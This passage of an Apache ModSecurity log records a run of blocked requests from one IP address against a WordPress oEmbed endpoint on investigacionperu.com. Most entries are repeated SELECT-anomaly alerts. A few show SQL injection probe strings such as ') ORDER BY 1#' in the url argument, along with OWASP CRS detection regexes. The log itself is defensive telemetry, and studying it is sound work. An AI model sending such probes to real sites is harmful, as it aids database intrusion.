"PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vEPAyXqJhbW53WyPSwAAAEI"] [Thu Aug 15 03:22:20.543724 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:56828] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vHxeJlWfH1pdny5XOQAAAMk"] [Thu Aug 15 03:22:21.162666 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:56830] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vXxeJlWfH1pdny5XOgAAANg"] [Thu Aug 15 03:22:21.558837 2024] [:error] [pid 31336:tid 139654058071808] [client 141.98.81.52:56834] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vUPAyXqJhbW53WyPTAAAAEE"] [Thu Aug 15 03:22:21.985085 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:56836] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vXxeJlWfH1pdny5XPAAAAMY"] [Thu Aug 15 03:22:22.543913 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:56842] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vnxeJlWfH1pdny5XPQAAANQ"] [Thu Aug 15 03:22:22.913360 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56844] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26vnxeJlWfH1pdny5XPgAAAME"] [Thu Aug 15 03:22:23.343091 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:56846] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26v-wCyyCVFXh0DMS2fgAAAIQ"] [Thu Aug 15 03:22:23.823343 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:56848] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26v3xeJlWfH1pdny5XPwAAAMM"] [Thu Aug 15 03:22:24.230496 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56852] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wHxeJlWfH1pdny5XQQAAANc"] [Thu Aug 15 03:22:24.801345 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56854] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wHxeJlWfH1pdny5XQgAAANI"] [Thu Aug 15 03:22:25.280626 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:56858] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wXxeJlWfH1pdny5XRAAAAMw"] [Thu Aug 15 03:22:25.706372 2024] [:error] [pid 31335:tid 139653948634880] [client 141.98.81.52:56860] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wW0MD5oChETZltkVTgAAAAY"] [Thu Aug 15 03:22:26.101872 2024] [:error] [pid 31335:tid 139653822744320] [client 141.98.81.52:56864] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/ ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wm0MD5oChETZltkVUAAAABU"] [Thu Aug 15 03:22:26.554052 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:56866] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26wnxeJlWfH1pdny5XRQAAAM8"] [Thu Aug 15 03:22:27.039916 2024] [:error] [pid 31337:tid 139654041286400] [client 141.98.81.52:56870] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26w-wCyyCVFXh0DMS2fwAAAIM"] [Thu Aug 15 03:22:27.467145 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:56872] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26w3xeJlWfH1pdny5XRwAAANY"] [Thu Aug 15 03:22:27.894643 2024] [:error] [pid 31335:tid 139653889885952] [client 141.98.81.52:56874] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26w20MD5oChETZltkVUQAAAA0"] [Thu Aug 15 03:22:28.405934 2024] [:error] [pid 31335:tid 139653856315136] [client 141.98.81.52:56876] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xG0MD5oChETZltkVUgAAABE"] [Thu Aug 15 03:22:28.806589 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:56878] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xHxeJlWfH1pdny5XSAAAAM0"] [Thu Aug 15 03:22:29.233717 2024] [:error] [pid 31335:tid 139653831137024] [client 141.98.81.52:56880] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xW0MD5oChETZltkVUwAAABQ"] [Thu Aug 15 03:22:29.668998 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:56882] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xXxeJlWfH1pdny5XSQAAAMI"] [Thu Aug 15 03:22:30.128619 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56884] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xnxeJlWfH1pdny5XSgAAAME"] [Thu Aug 15 03:22:30.541725 2024] [:error] [pid 31336:tid 139653839529728] [client 141.98.81.52:56886] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xkPAyXqJhbW53WyPTQAAAFM"] [Thu Aug 15 03:22:30.961089 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:56888] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26xnxeJlWfH1pdny5XSwAAAMs"] [Thu Aug 15 03:22:31.443837 2024] [:error] [pid 31335:tid 139653881493248] [client 141.98.81.52:56890] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26x20MD5oChETZltkVVAAAAA4"] [Thu Aug 15 03:22:31.847523 2024] [:error] [pid 31335:tid 139653915064064] [client 141.98.81.52:56892] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26x20MD5oChETZltkVVQAAAAo"] [Thu Aug 15 03:22:32.315852 2024] [:error] [pid 31335:tid 139653923456768] [client 141.98.81.52:56894] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26yG0MD5oChETZltkVVgAAAAk"] [Thu Aug 15 03:22:32.883859 2024] [:error] [pid 31336:tid 139653898278656] [client 141.98.81.52:56896] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26yEPAyXqJhbW53WyPTgAAAEw"] [Thu Aug 15 03:22:33.345330 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:56898] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26yXxeJlWfH1pdny5XTAAAAMM"] [Thu Aug 15 03:22:33.686726 2024] [:error] [pid 31336:tid 139653797566208] [client 141.98.81.52:56900] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26yUPAyXqJhbW53WyPTwAAAFg"] [Thu Aug 15 03:22:34.066009 2024] [:error] [pid 31336:tid 139653940242176] [client 141.98.81.52:56902] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data 